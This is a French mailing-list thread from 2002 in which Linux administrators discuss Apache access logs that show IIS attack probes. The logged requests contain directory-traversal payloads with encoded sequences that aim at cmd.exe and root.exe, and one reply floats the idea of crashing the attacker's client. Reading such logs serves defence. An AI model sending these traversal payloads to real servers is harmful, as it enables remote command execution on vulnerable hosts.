et si on cree betement un fichier qui recherche et qui ferait planter le client, ca pourrait etre bien! Personne n'as d'idee comment le concevoir...
-----Message d'origine----- De : [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]De la part de Bruno Pinaud Envoyé : lundi, 14. janvier 2002 10:23 À : [EMAIL PROTECTED]; [EMAIL PROTECTED] Objet : Re: [Confirme] Attaque d'Apache ? Le fichier est dans /var/log/httpd/error.log pour les erreurs et access.log pour le reste. Perso, j'ai tellement d'attaque de ce genre, que je n'y fait même plus attention. J'ai juste des logs relativement gros en comparaison du traffic sur mon serveur. Le Lundi 14 Janvier 2002 09:59, alain siani a écrit : > pouvez vous me dire quel est le fichier de log de apache ou l'on trouve > cela ? Merci ! > Alain > > Le Lundi 14 Janvier 2002 09:49, vous avez ?rit : > > > J'ai eu le meme pb avec exactement les memes logs sur mon apache > > > provenant > > > > d'un rigolo de Wanadoo sur Paris. > > > > Je pense qu'une bonne plainte serait une bonne chose. > > Wanadoo a un mail a disposition pour transmettre les pb de ce genre (voir > > la hot line de Wanadoo pour avoir le mail en question). > > > > Christian RAGUET. > > > > > > -----Message d'origine----- > > De: Denis Bergeron [mailto:[EMAIL PROTECTED]] > > Date: lundi 14 janvier 2002 02:18 > > À: [EMAIL PROTECTED] > > Objet: Re: [Confirme] Attaque d'Apache ? > > > > > > C'est une attaque, il essaye d'exécuter le programme "root.exe" "cmd" .. > > qui > > > > justement donne l'équivalent du accès telnet root sur IIS, mais c'est des > > vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui a > > pris des trucs de l'an passée et qui sait pas faire la différence avec > > apache et IIS... au pire, tu peux (en fait tu devrais) faire un recherche > > du propriétaire de l'adresse et faire une plainte officielle à son ISP > > (FAI)... Au Canada, la plupart des founisseurs d'accès à Internet coupe > > le compte de ce genre de personne après trois plainte.s > > > > -Denis > > > > Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : > > > Bonsoir, > > > > > > Les logs d'Apache ci-dessous montrent que des tentatives de recherches > > > de fichiers Windows se font sur mon Linux Mandrake 8.1. Les IP sont > > > celles de France-Télécom. > > > Ce serveur n'était pas censé fournir des pages sur Internet mais > > > seulement en intranet. Il était ouvert sur l'extérieur à des fins de > > > tests. Depuis, je l'ai verrouillé et en ai profité pour installer > > > Bastille. > > > > > > Pour mon information personnelle, s'agit-il d'une tentative d'attaque > > > ou d'une requête normale de FT (je doute) ? > > > > > > Merci pour vos lumières. > > > > > > AF > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] "GET > > > /scripts/root.exe?/c+dir HTTP/1.0" 404 300 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] "GET > > > /MSADC/root.exe?/c+dir HTTP/1.0" 404 298 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] "GET > > > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] "GET > > > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] "GET > > > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" > > > "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:38 +0100] "GET > > > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > > > > HTTP/ > > > > > 1.0" 404 339 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:47 +0100] "GET > > > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > > > > HTTP/ > > > > > 1.0" 404 339 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:58 +0100] "GET > > > > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt > >/s > > > > > ystem32/cmd.exe?/c+dir HTTP/1.0" 404 355 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:21:03 +0100] "GET > > > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" > > > > "-" > > > > > 193.253.226.194 - - [11/Jan/2002:21:21:06 +0100] "GET > > > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" > > > > "-" > > > > > 193.253.226.194 - - [11/Jan/2002:21:21:10 +0100] "GET > > > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" > > > > "-" > > > > > 193.253.226.194 - - [11/Jan/2002:21:21:15 +0100] "GET > > > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" > > > > "-" > > > > > 193.253.226.194 - - [11/Jan/2002:21:21:19 +0100] "GET > > > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 305 > > > "-" > > > > "- > > > > > " > > > > > > 193.253.226.194 - - [11/Jan/2002:21:21:30 +0100] "GET > > > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 305 "-" > > > "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:21:36 +0100] "GET > > > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 > > > "-" > > > > > > "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:21:40 +0100] "GET > > > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" > > > "-" > > ---------------------------------------- > Content-Type: text/plain; charset="iso-8859-1"; name="message.footer" > Content-Transfer-Encoding: 8bit > Content-Description: > ---------------------------------------- -- Bruno Pinaud Ecole Polytechnique de l'université de Nantes (Polytech' Nantes) Institut de recherche en informatique de Nantes (IRIN)
Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur "http://www.mandrakestore.com";
